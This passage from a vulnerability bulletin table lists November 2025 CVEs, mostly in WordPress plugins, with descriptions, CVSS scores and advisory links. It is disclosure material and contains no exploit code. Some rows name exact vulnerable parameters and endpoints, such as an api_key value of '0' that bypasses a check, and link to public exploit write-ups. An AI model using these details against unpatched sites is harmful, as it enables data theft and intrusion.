| saadiqbal--New User Approve | The New User Approve plugin for WordPress is vulnerable to unauthorized data disclosure in all versions up to, and including, 3.0.9 due to insufficient API key validation using loose equality comparison. This makes it possible for unauthenticated attackers to retrieve personally identifiable information (PII), including usernames and email addresses of users with various approval statuses via the Zapier REST API endpoints, by exploiting PHP type juggling with the api_key parameter set to "0" on sites where the Zapier API key has not been configured. | 2025-11-19 | 5.3 | CVE-2025-12770 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3f1cf77a-64b4-405b-adcb-ef16d9e82ab2?source=cve https://plugins.trac.wordpress.org/browser/new-user-approve/tags/3.0.9/includes/zapier/includes/rest-api.php#L104 https://plugins.trac.wordpress.org/browser/new-user-approve/tags/3.0.9/includes/zapier/includes/rest-api.php#L40 https://plugins.trac.wordpress.org/browser/new-user-approve/trunk/includes/zapier/includes/rest-api.php#L104   |
| sayontan--Photonic Gallery & Lightbox for Flickr, SmugMug & Others | The Photonic Gallery & Lightbox for Flickr, SmugMug & Others plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's lightbox functionality in all versions up to, and including, 3.21 due to insufficient input sanitization and output escaping on user supplied caption attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the injected page. | 2025-11-18 | 6.4 | CVE-2025-12691 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9f21f4a4-4b50-4396-8d94-26d68c0eb3a3?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3392284%40photonic&old=3336902%40photonic&sfp_email=&sfph_mail=   |
| Saysis Computer Systems Trade Ltd. Co.--StarCities | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Saysis Computer Systems Trade Ltd. Co. StarCities allows Reflected XSS. This issue affects StarCities: before 1.1.61. | 2025-11-19 | 5.4 | CVE-2025-11963 | https://www.usom.gov.tr/bildirim/tr-25-0403   |
| scottpaterson--Subscriptions & Memberships for PayPal | The Subscriptions & Memberships for PayPal plugin for WordPress is vulnerable to fake payment creation in all versions up to, and including, 1.1.7. This is due to the plugin not properly verifying the authenticity of an IPN request. This makes it possible for unauthenticated attackers to create fake payment entries that have not actually occurred. | 2025-11-22 | 5.3 | CVE-2025-12752 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8f706b78-2d67-442c-b7a0-7d7a0fd24b2d?source=cve https://plugins.trac.wordpress.org/browser/subscriptions-memberships-for-paypal/trunk/includes/public_ipn.php https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3397608%40subscriptions-memberships-for-paypal&new=3397608%40subscriptions-memberships-for-paypal&sfp_email=&sfph_mail=   |
| seventhqueen--Restrictions for BuddyPress | The Restrictions for BuddyPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the handle_optin_optout() function in all versions up to, and including, 1.5.2. This makes it possible for unauthenticated attackers to opt in and out of tracking. | 2025-11-18 | 5.3 | CVE-2025-12391 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f4fe5ed7-17e2-4098-a51b-3b780721bf2e?source=cve https://wordpress.org/plugins/bp-restrict/   |
| Shopside Software Technologies Inc.--Shopside | Improper Restriction of Rendered UI Layers or Frames vulnerability in Shopside Software Technologies Inc. Shopside allows iFrame Overlay. This issue affects Shopside: through 05022025. | 2025-11-19 | 4.7 | CVE-2025-0421 | https://www.usom.gov.tr/bildirim/tr-25-0402   |
| Siemens--Mendix RichText | A vulnerability has been identified in Mendix RichText (All versions >= V4.0.0 < V4.6.1). Affected widget does not properly neutralize the input. This could allow an attacker to execute cross-site scripting attacks. | 2025-11-17 | 5.7 | CVE-2025-40834 | https://cert-portal.siemens.com/productcert/html/ssa-190588.html   |
| SMCI--MBD-X13SEDW-F | Stack-based buffer overflow in the SMASH-CLP shell. An authenticated attacker with SSH access to the BMC can exploit a stack buffer overflow via a crafted SMASH command, overwrite the return address and registers, and achieve arbitrary code execution on the BMC firmware operating system. | 2025-11-18 | 5.4 | CVE-2025-7623 | https://www.supermicro.com/zh_tw/support/security_BMC_IPMI_Nov_2025   |
| SMCI--MBD-X13SEDW-F | Stack buffer overflow vulnerability exists in the Supermicro BMC Shared library. An authenticated attacker with access to the BMC can exploit the stack buffer overflow via a crafted header and achieve arbitrary code execution on the BMC's firmware operating system. | 2025-11-18 | 5.5 | CVE-2025-8404 | https://www.supermicro.com/zh_tw/support/security_BMC_IPMI_Nov_2025   |
| softaculous--SiteSEO SEO Simplified | The SiteSEO - SEO Simplified plugin for WordPress is vulnerable to unauthorized modification of data due to an incorrect capability check on the siteseo_reset_settings function in all versions up to, and including, 1.3.2. This makes it possible for authenticated attackers, who have been granted access to at least one SiteSEO setting capability, to reset the plugin's settings. | 2025-11-19 | 5.3 | CVE-2025-12814 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a376cafb-656c-4fe1-b5c1-c7e38dc5040e?source=cve https://plugins.trac.wordpress.org/browser/siteseo/tags/1.3.2/main/ajax.php#L90 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3397272%40siteseo&new=3397272%40siteseo&sfp_email=&sfph_mail=   |
| softaculous--SiteSEO SEO Simplified | The SiteSEO - SEO Simplified plugin for WordPress is vulnerable to Improper Authorization leading to Sensitive Post Meta Disclosure in versions up to and including 1.3.2. This is due to missing object-level authorization checks in the resolve_variables() AJAX handler. This makes it possible for authenticated attackers with the siteseo_manage capability (e.g., Author-level users who have been granted SiteSEO access by an administrator) to read arbitrary post metadata from any post, page, attachment, or WooCommerce order they cannot edit, via the custom field variable resolution feature granted they have been given access to SiteSEO by an administrator and legacy storage is enabled. In affected WooCommerce installations, this exposes sensitive customer billing information including names, email addresses, phone numbers, physical addresses, and payment methods. | 2025-11-19 | 4.3 | CVE-2025-13085 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4d740ba8-4877-4b27-a1cb-26095f851ea6?source=cve https://plugins.trac.wordpress.org/browser/siteseo/trunk/main/ajax.php#L542 https://plugins.trac.wordpress.org/browser/siteseo/trunk/main/titlesmetas.php#L494 https://plugins.trac.wordpress.org/browser/siteseo/trunk/main/admin.php#L106 https://plugins.trac.wordpress.org/changeset/3397272/siteseo/trunk?contextall=1&old=3387094&old_path=%2Fsiteseo%2Ftrunk   |
| SolarWinds--SolarWinds Observability Self-Hosted | SolarWinds Observability Self-Hosted XSS Vulnerability. The SolarWinds Platform was susceptible to a XSS vulnerability that affects user-created URL fields. This vulnerability requires authentication from a low-level account. | 2025-11-18 | 5.4 | CVE-2025-26391 | https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-26391 https://documentation.solarwinds.com/en/success_center/orionplatform/content/release_notes/hco_2025-4-1_release_notes.htm   |
| SolarWinds--SolarWinds Observability Self-Hosted | SolarWinds Observability Self-Hosted is susceptible to an open redirection vulnerability. The URL is not properly sanitized, and an attacker could manipulate the string to redirect a user to a malicious site. The attack complexity is high, and authentication is required. | 2025-11-18 | 4.8 | CVE-2025-40545 | https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40545 https://documentation.solarwinds.com/en/success_center/orionplatform/content/release_notes/hco_2025-4-1_release_notes.htm   |
| SourceCodester--Alumni Management System | A weakness has been identified in SourceCodester Alumni Management System 1.0. This issue affects the function delete_forum/delete_career/delete_comment/delete_gallery/delete_event of the file admin/admin_class.php of the component Delete Handler. Executing manipulation of the argument ID can lead to missing authorization. It is possible to launch the attack remotely. The exploit has been made available to the public and could be exploited. | 2025-11-20 | 5.4 | CVE-2025-13468 | VDB-333041 \| SourceCodester Alumni Management System Delete admin_class.php delete_event authorization VDB-333041 \| CTI Indicators (IOB, IOC, IOA) Submit #694826 \| SourceCodester Alumni Management System 1.0 Missing Authorization https://hackmd.io/@mlgzackfly/SourceCodester https://www.sourcecodester.com/   |
| SourceCodester--Dental Clinic Appointment Reservation System | A vulnerability was detected in SourceCodester Dental Clinic Appointment Reservation System 1.0. Impacted is an unknown function of the file /success.php. Performing manipulation of the argument username/password results in sql injection. The attack can be initiated remotely. The exploit is now public and may be used. | 2025-11-17 | 6.3 | CVE-2025-13267 | VDB-332602 \| SourceCodester Dental Clinic Appointment Reservation System success.php sql injection VDB-332602 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #689450 \| Dental Clinic Appointment Reservation System 1.0 SQL Injection https://github.com/0xffaaa/cve/blob/main/Dental_Clinic_Appointment_Reservation_System_Time-Based_SQL_Injection2.md https://www.sourcecodester.com/   |
| SourceCodester--Inventory Management System | A weakness has been identified in SourceCodester Inventory Management System 1.0. The affected element is an unknown function of the file /model/user/resetPassword.php. Executing manipulation can lead to weak password recovery. The attack may be performed from remote. The exploit has been made available to the public and could be exploited. | 2025-11-23 | 5.3 | CVE-2025-13565 | VDB-333329 \| SourceCodester Inventory Management System resetPassword.php password recovery VDB-333329 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #697984 \| SourceCodester Inventory Management System 1.0 Business Logic Errors https://www.notion.so/Unauthenticated-Password-Reset-Vulnerability-in-SourceCodester-Inventory-Management-System-2b023917db8c8001b5ecf4c50a54dfbd?source=copy_link https://www.sourcecodester.com/   |
| SourceCodester--Online Magazine Management System | A vulnerability was identified in SourceCodester Online Magazine Management System 1.0. Affected by this issue is some unknown functionality of the file /categories.php. The manipulation of the argument c leads to sql injection. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. | 2025-11-17 | 6.3 | CVE-2025-13263 | VDB-332598 \| SourceCodester Online Magazine Management System categories.php sql injection VDB-332598 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #689416 \| Online Magazine Management System 1.0 SQL Injection https://github.com/0xffaaa/cve/blob/main/Online%20Magazine%20Management%20System%20SQL%20blind%20injection(SQLI).md https://www.sourcecodester.com/   |
| SourceCodester--Online Magazine Management System | A security flaw has been discovered in SourceCodester Online Magazine Management System 1.0. This affects an unknown part of the file /view_magazine.php. The manipulation of the argument ID results in sql injection. The attack may be performed from remote. The exploit has been released to the public and may be exploited. | 2025-11-17 | 6.3 | CVE-2025-13264 | VDB-332599 \| SourceCodester Online Magazine Management System view_magazine.php sql injection VDB-332599 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #689424 \| Online Magazine Management System 1.0 SQL Injection https://github.com/0xffaaa/cve/blob/main/Online%20Magazine%20Management%20System%20SQL%20blind%20injection2(SQLI)%20.md https://www.sourcecodester.com/   |
| SourceCodester--Pre-School Management System | A security flaw has been discovered in SourceCodester Pre-School Management System 1.0. Impacted is the function removefile of the file app/controllers/FilehelperController.php. Performing manipulation of the argument filepath results in denial of service. The attack is possible to be carried out remotely. The exploit has been released to the public and may be exploited. | 2025-11-23 | 5.4 | CVE-2025-13564 | VDB-333328 \| SourceCodester Pre-School Management System FilehelperController.php removefile denial of service VDB-333328 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #697083 \| Pre-School Management System 1.0 delete file https://github.com/0xffaaa/cve/blob/main/Pre_School_Management_System_Arbitrary_File_Deletion_Vulnerabilit.md https://www.sourcecodester.com/   |
| SourceCodester--Train Station Ticketing System | A security vulnerability has been detected in SourceCodester Train Station Ticketing System 1.0. Affected by this issue is some unknown functionality of the file /ajax.php?action=save_ticket. Such manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. | 2025-11-18 | 6.3 | CVE-2025-13345 | VDB-332763 \| SourceCodester Train Station Ticketing System ajax.php sql injection VDB-332763 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #691943 \| SonarSource Train Station Ticketing System V1.0 SQL Injection https://github.com/puppytgyh/-CVE/issues/15 https://www.sourcecodester.com/   |
| SourceCodester--Train Station Ticketing System | A vulnerability was detected in SourceCodester Train Station Ticketing System 1.0. This affects an unknown part of the file /ajax.php?action=save_station. Performing manipulation of the argument id/station results in sql injection. The attack may be initiated remotely. The exploit is now public and may be used. | 2025-11-18 | 6.3 | CVE-2025-13346 | VDB-332764 \| SourceCodester Train Station Ticketing System ajax.php sql injection VDB-332764 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #691944 \| SourceCodester Train Station Ticketing System V1.0 SQL Injection https://github.com/puppytgyh/-CVE/issues/16 https://www.sourcecodester.com/   |
| SourceCodester--Train Station Ticketing System | A flaw has been found in SourceCodester Train Station Ticketing System 1.0. This vulnerability affects unknown code of the file /ajax.php?action=save_user. Executing manipulation of the argument Username can lead to sql injection. The attack may be launched remotely. The exploit has been published and may be used. | 2025-11-18 | 6.3 | CVE-2025-13347 | VDB-332765 \| SourceCodester Train Station Ticketing System ajax.php sql injection VDB-332765 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #691945 \| SourceCodester Train Station Ticketing System V1.0 SQL Injection https://github.com/puppytgyh/-CVE/issues/17 https://www.sourcecodester.com/   |
| sscovil--CSV to SortTable | The CSV to SortTable plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'csv' shortcode in all versions up to, and including, 4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-18 | 6.4 | CVE-2025-12823 | https://www.wordfence.com/threat-intel/vulnerabilities/id/53c59793-27db-44fa-92c8-2184d6914d8f?source=cve https://wordpress.com/plugins/csv-to-sorttable   |
| sundayfanz--wModes Catalog Mode, Product Pricing, Enquiry Forms & Promotions \| for WooCommerce | The wModes - Catalog Mode, Product Pricing, Enquiry Forms & Promotions plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 1.2.2. This is due to the plugin not properly verifying that a user is authorized to access sensitive information via the AJAX endpoint. This makes it possible for authenticated attackers, with subscriber-level access and above, to extract sensitive information including user emails, usernames, roles, capabilities, and WooCommerce data such as products and payment methods. | 2025-11-18 | 4.3 | CVE-2025-12639 | https://www.wordfence.com/threat-intel/vulnerabilities/id/979001c4-45dd-4168-8749-c8eebe237b60?source=cve https://plugins.trac.wordpress.org/browser/catalog-mode-pricing-enquiry-forms-promotions/tags/1.2.1/framework/reon/core/class.reon.core.ajax.php#L12 https://plugins.trac.wordpress.org/browser/catalog-mode-pricing-enquiry-forms-promotions/tags/1.2.1/framework/reon/core/class.reon.core.ajax.php#L29 https://plugins.trac.wordpress.org/browser/catalog-mode-pricing-enquiry-forms-promotions/tags/1.2.1/framework/reon/core/class.reon.core.ajax.php#L165 https://plugins.trac.wordpress.org/changeset/3392651/catalog-mode-pricing-enquiry-forms-promotions/trunk?contextall=1&old=3390779&old_path=%2Fcatalog-mode-pricing-enquiry-forms-promotions%2Ftrunk#file11   |
| surbma--Surbma \| MiniCRM Shortcode | The Surbma \| MiniCRM Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' shortcode attribute of the 'minicrm' shortcode in all versions up to, and including, 2.0. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-11800 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f7509053-fc70-420a-b998-b7158732c147?source=cve https://plugins.trac.wordpress.org/browser/surbma-minicrm-shortcode/tags/2.0/surbma-minicrm-shortcode.php#L34   |
| tainacan--Tainacan | The Tainacan plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'search' parameter in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-11-21 | 6.1 | CVE-2025-12746 | https://www.wordfence.com/threat-intel/vulnerabilities/id/014dd0ee-0bd0-477c-a0fa-bde8ce5a099c?source=cve https://github.com/tainacan/tainacan/blob/2491612ee9d5b14baa70862ba2308ee925de0938/src/classes/theme-helper/template-tags.php#L1652 https://plugins.trac.wordpress.org/changeset/3395909/tainacan/trunk/classes/theme-helper/template-tags.php   |
| tainacan--Tainacan | The Tainacan plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.0 via uploaded files marked as private being exposed in wp-content without adequate protection. This makes it possible for unauthenticated attackers to extract potentially sensitive information from files that have been marked as private. | 2025-11-21 | 5.3 | CVE-2025-12747 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c64869f0-a4dd-4135-8ed8-a6ff82a48e1f?source=cve https://github.com/tainacan/tainacan/blob/2491612ee9d5b14baa70862ba2308ee925de0938/src/classes/class-tainacan-private-files.php https://github.com/tainacan/tainacan/compare/1.0.0...1.0.1   |
| Tanium--TanOS | Tanium addressed an arbitrary file deletion vulnerability in TanOS. | 2025-11-19 | 5.6 | CVE-2025-13225 | TAN-2025-036   |
| techjewel--FluentCRM Email Newsletter, Automation, Email Marketing, Email Campaigns, Optins, Leads, and CRM Solution | The FluentCRM - Email Newsletter, Automation, Email Marketing, Email Campaigns, Optins, Leads, and CRM Solution plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'fluentcrm_content' shortcode in all versions up to, and including, 2.9.84 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-12935 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7129e5cb-ce70-477a-a8f1-3acf152dfc21?source=cve https://plugins.trac.wordpress.org/browser/fluent-crm/tags/2.9.84/app/Hooks/actions.php#L172 https://plugins.trac.wordpress.org/browser/fluent-crm/tags/2.9.84/app/Hooks/Handlers/PrefFormHandler.php#L175 https://plugins.trac.wordpress.org/changeset/3399640/   |
| techlabpro1--Classified Listing AI-Powered Classified ads & Business Directory Plugin | The Classified Listing - Classified ads & Business Directory Plugin plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5.0.3. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes. | 2025-11-17 | 5.4 | CVE-2025-7711 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d9b10db9-0c7c-4f13-9d98-6d407446cfb8?source=cve https://plugins.trac.wordpress.org/browser/classified-listing/tags/5.0.2/app/Controllers/Hooks/FilterHooks.php#L367   |
| themeatelier--IDonate Blood Donation, Request And Donor Management System | The IDonate - Blood Donation, Request And Donor Management System plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the panding_blood_request_action() function in all versions up to, and including, 2.1.15. This makes it possible for unauthenticated attackers to delete arbitrary posts. | 2025-11-22 | 5.3 | CVE-2025-12877 | https://www.wordfence.com/threat-intel/vulnerabilities/id/96bd997f-63d5-47a7-b433-486c1113b44b?source=cve https://plugins.trac.wordpress.org/changeset/3398056/idonate/trunk/src/Helpers/IDonateAjaxHandler.php?old=3372718&old_path=idonate%2Ftags%2F2.1.13%2Fsrc%2FHelpers%2FIDonateAjaxHandler.php https://plugins.trac.wordpress.org/changeset/3400306/idonate/trunk/src/Helpers/IDonateAjaxHandler.php?old=3372718&old_path=idonate%2Ftags%2F2.1.13%2Fsrc%2FHelpers%2FIDonateAjaxHandler.php   |
| thimpress--LearnPress WordPress LMS Plugin | The LearnPress - WordPress LMS Plugin plugin for WordPress is vulnerable to Sensitive Information Disclosure in all versions up to, and including, 4.2.9.4. This is due to missing capability checks in the REST endpoint /wp-json/lp/v1/load_content_via_ajax which allows arbitrary callback execution of admin-only template methods. This makes it possible for unauthenticated attackers to retrieve admin curriculum HTML, quiz questions with correct answers, course materials, and other sensitive educational content via the REST API endpoint granted they can supply valid numeric IDs. | 2025-11-21 | 5.3 | CVE-2025-11368 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0c9856db-3779-4649-9a48-1c7b6d019816?source=cve https://plugins.trac.wordpress.org/browser/learnpress/trunk/inc/rest-api/v1/frontend/class-lp-rest-ajax-controller.php#L41 https://plugins.trac.wordpress.org/browser/learnpress/trunk/inc/rest-api/v1/frontend/class-lp-rest-ajax-controller.php#L23 https://plugins.trac.wordpress.org/changeset?old_path=/learnpress/tags/4.2.9.4&new_path=/learnpress/tags/4.3.0&sfp_email=&sfph_mail=   |
| tigroumeow--AI Engine | The AI Engine plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 3.1.8 via the rest_helpers_create_images function. This makes it possible for authenticated attackers, with Editor-level access and above, to make web requests to arbitrary locations originating from the web application, which can be used to query and modify information from internal services. On Cloud instances, this issue allows for metadata retrieval. | 2025-11-18 | 6.8 | CVE-2025-8084 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3b497bc0-bf47-43c7-9d5f-8e130dd0bab2?source=cve https://plugins.trac.wordpress.org/browser/ai-engine/tags/2.9.5/classes/rest.php#L742 https://plugins.trac.wordpress.org/browser/ai-engine/tags/2.9.5/classes/services/image.php#L89   |
| timeslotplugins--Booking Plugin for WordPress Appointments Time Slot | The Booking Plugin for WordPress Appointments - Time Slot plugin for WordPress is vulnerable to unauthorized email sending in versions up to, and including, 1.4.7 due to missing validation on the tslot_appt_email AJAX action. This makes it possible for unauthenticated attackers to send appointment notification emails to arbitrary recipients with attacker-controlled text content in certain email fields, potentially enabling the site to be abused for phishing campaigns or spam distribution. | 2025-11-19 | 5.3 | CVE-2025-12842 | https://www.wordfence.com/threat-intel/vulnerabilities/id/087b6943-5da8-44fe-8614-832768444178?source=cve https://plugins.trac.wordpress.org/browser/timeslot/tags/1.4.6/public/form/email.php#L21 https://plugins.trac.wordpress.org/browser/timeslot/tags/1.4.6/public/form/email.php#L23 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3397527%40timeslot&new=3397527%40timeslot&sfp_email=&sfph_mail=   |
| trainingbusinesspros--Groundhogg CRM, Newsletters, and Marketing Automation | The Groundhogg - CRM, Newsletters, and Marketing Automation plugin for WordPress is vulnerable to SQL Injection via the 'term' parameter in all versions up to, and including, 4.2.6.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-11-21 | 4.9 | CVE-2025-12750 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e3d231e1-a63e-4b41-a6b7-91e6dfc33600?source=cve https://github.com/groundhoggwp/groundhogg/blob/master/includes/functions.php#L5705 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3394550%40groundhogg&new=3394550%40groundhogg&sfp_email=&sfph_mail=#file14   |
| tripleatechnology--Cryptocurrency Payment Gateway for WooCommerce | The Cryptocurrency Payment Gateway for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'handle_optin_optout' function in all versions up to, and including, 2.0.22. This makes it possible for unauthenticated attackers to opt in and out of tracking. | 2025-11-18 | 5.3 | CVE-2025-12392 | https://www.wordfence.com/threat-intel/vulnerabilities/id/96d48392-fb64-4e5e-be9c-21df0bf75de6?source=cve https://wordpress.org/plugins/triplea-cryptocurrency-payment-gateway-for-woocommerce/   |
| userelements--Ultimate Member Widgets for Elementor WordPress User Directory | The Ultimate Member Widgets for Elementor - WordPress User Directory plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the handle_filter_users function in all versions up to, and including, 2.3. This makes it possible for unauthenticated attackers to extract partial metadata of all WordPress users, including their first name, last name and email addresses. | 2025-11-20 | 5.3 | CVE-2025-12778 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a917a24b-09cc-48e9-844a-e1ed573a708f?source=cve https://plugins.trac.wordpress.org/changeset/3397029/ultimate-member-widgets-for-elementor   |
| valentinpellegrin--ACF Flexible Layouts Manager | The ACF Flexible Layouts Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'acf_flm_update_template_with_pasted_layout' function in all versions up to, and including, 1.1.6. This makes it possible for unauthenticated attackers to update custom field values on individual posts and pages. | 2025-11-18 | 6.5 | CVE-2025-12937 | https://www.wordfence.com/threat-intel/vulnerabilities/id/915cce97-8305-4249-b2d3-c4da2f59a95a?source=cve https://plugins.trac.wordpress.org/browser/acf-flexible-layouts-manager/trunk/includes/ajax/ajax-paste.php#L4   |
| vaniivan--Simple User Import Export | The Simple User Import Export plugin for WordPress is vulnerable to CSV Injection in all versions up to, and including, 1.1.7 via the 'Import/export users' function. This makes it possible for authenticated attackers, with Administrator-level access and above, to embed untrusted input into exported CSV files, which can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration. | 2025-11-18 | 6.6 | CVE-2025-13133 | https://www.wordfence.com/threat-intel/vulnerabilities/id/39ec49b4-f0f3-4ec7-b11b-ce808c025577?source=cve https://it.wordpress.org/plugins/a3-user-importer/   |
| vllm-project--vllm | vLLM is an inference and serving engine for large language models (LLMs). From version 0.5.5 to before 0.11.1, the /v1/chat/completions and /tokenize endpoints allow a chat_template_kwargs request parameter that is used in the code before it is properly validated against the chat template. With the right chat_template_kwargs parameters, it is possible to block processing of the API server for long periods of time, delaying all other requests. This issue has been patched in version 0.11.1. | 2025-11-21 | 6.5 | CVE-2025-62426 | https://github.com/vllm-project/vllm/security/advisories/GHSA-69j4-grxj-j64p https://github.com/vllm-project/vllm/pull/27205 https://github.com/vllm-project/vllm/commit/3ada34f9cb4d1af763fdfa3b481862a93eb6bd2b https://github.com/vllm-project/vllm/blob/2a6dc67eb520ddb9c4138d8b35ed6fe6226997fb/vllm/entrypoints/chat_utils.py#L1602-L1610 https://github.com/vllm-project/vllm/blob/2a6dc67eb520ddb9c4138d8b35ed6fe6226997fb/vllm/entrypoints/openai/serving_engine.py#L809-L814   |
| westerndeal--GSheetConnector For Ninja Forms | The GSheetConnector For Ninja Forms plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'njform-google-sheet-config' page in all versions up to, and including, 2.0.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve information about the system. | 2025-11-22 | 4.3 | CVE-2025-13136 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5770cb94-8603-44d9-8cda-925175851b51?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3399046%40gsheetconnector-ninja-forms&new=3399046%40gsheetconnector-ninja-forms&sfp_email=&sfph_mail=   |
| willbontrager--Local Syndication | The Local Syndication plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.5a via the `url` parameter in the `[syndicate_local]` shortcode. This is due to the use of `wp_remote_get()` instead of `wp_safe_remote_get()` which lacks protections against requests to internal/private IP addresses and localhost. This makes it possible for authenticated attackers, with Contributor-level access and above, to make web requests to arbitrary locations originating from the web application, which can be used to query and modify information from internal services, scan internal networks, and access resources that should not be accessible from external networks. | 2025-11-18 | 6.4 | CVE-2025-12962 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7774cdfd-622a-4608-9efd-273923a0d0aa?source=cve https://plugins.trac.wordpress.org/browser/local-syndication/tags/1.5/local_syndication.php#L64 https://plugins.trac.wordpress.org/browser/local-syndication/tags/1.5/local_syndication.php#L41   |
| winkm89--WP Admin Microblog | The WP Admin Microblog plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.1. This is due to missing or incorrect nonce validation on the 'wp-admin-microblog' page. This makes it possible for unauthenticated attackers to send messages on behalf of an administrator via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-11-18 | 4.3 | CVE-2025-12173 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9c26a76d-a104-4ea6-be9f-9e8dfc3b5cd5?source=cve https://wordpress.org/plugins/wp-admin-microblog/   |
| withastro--astro | Astro is a web framework. Prior to version 5.15.9, when using Astro's Cloudflare adapter (@astrojs/cloudflare) with output: 'server', the image optimization endpoint (/_image) contains a critical vulnerability in the isRemoteAllowed() function that unconditionally allows data: protocol URLs. This enables Cross-Site Scripting (XSS) attacks through malicious SVG payloads, bypassing domain restrictions and Content Security Policy protections. This issue has been patched in version 5.15.9. | 2025-11-19 | 5.4 | CVE-2025-65019 | https://github.com/withastro/astro/security/advisories/GHSA-fvmw-cj7j-j39q https://github.com/withastro/astro/commit/9e9c528191b6f5e06db9daf6ad26b8f68016e533   |
| wpengine--WP Migrate Lite WordPress Migration Made Easy | The WP Migrate Lite - WordPress Migration Made Easy plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 2.7.6 via the wpmdb_flush AJAX action. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to obtain information about internal services. | 2025-11-18 | 5.8 | CVE-2025-11427 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4b098711-ed01-4a71-b0df-30ff4fffa930?source=cve https://plugins.trac.wordpress.org/browser/wp-migrate-db/tags/2.7.5/class/Common/MigrationPersistence/Persistence.php#L50 https://plugins.trac.wordpress.org/browser/wp-migrate-db/tags/2.7.5/class/Common/Migration/Flush.php#L69   |
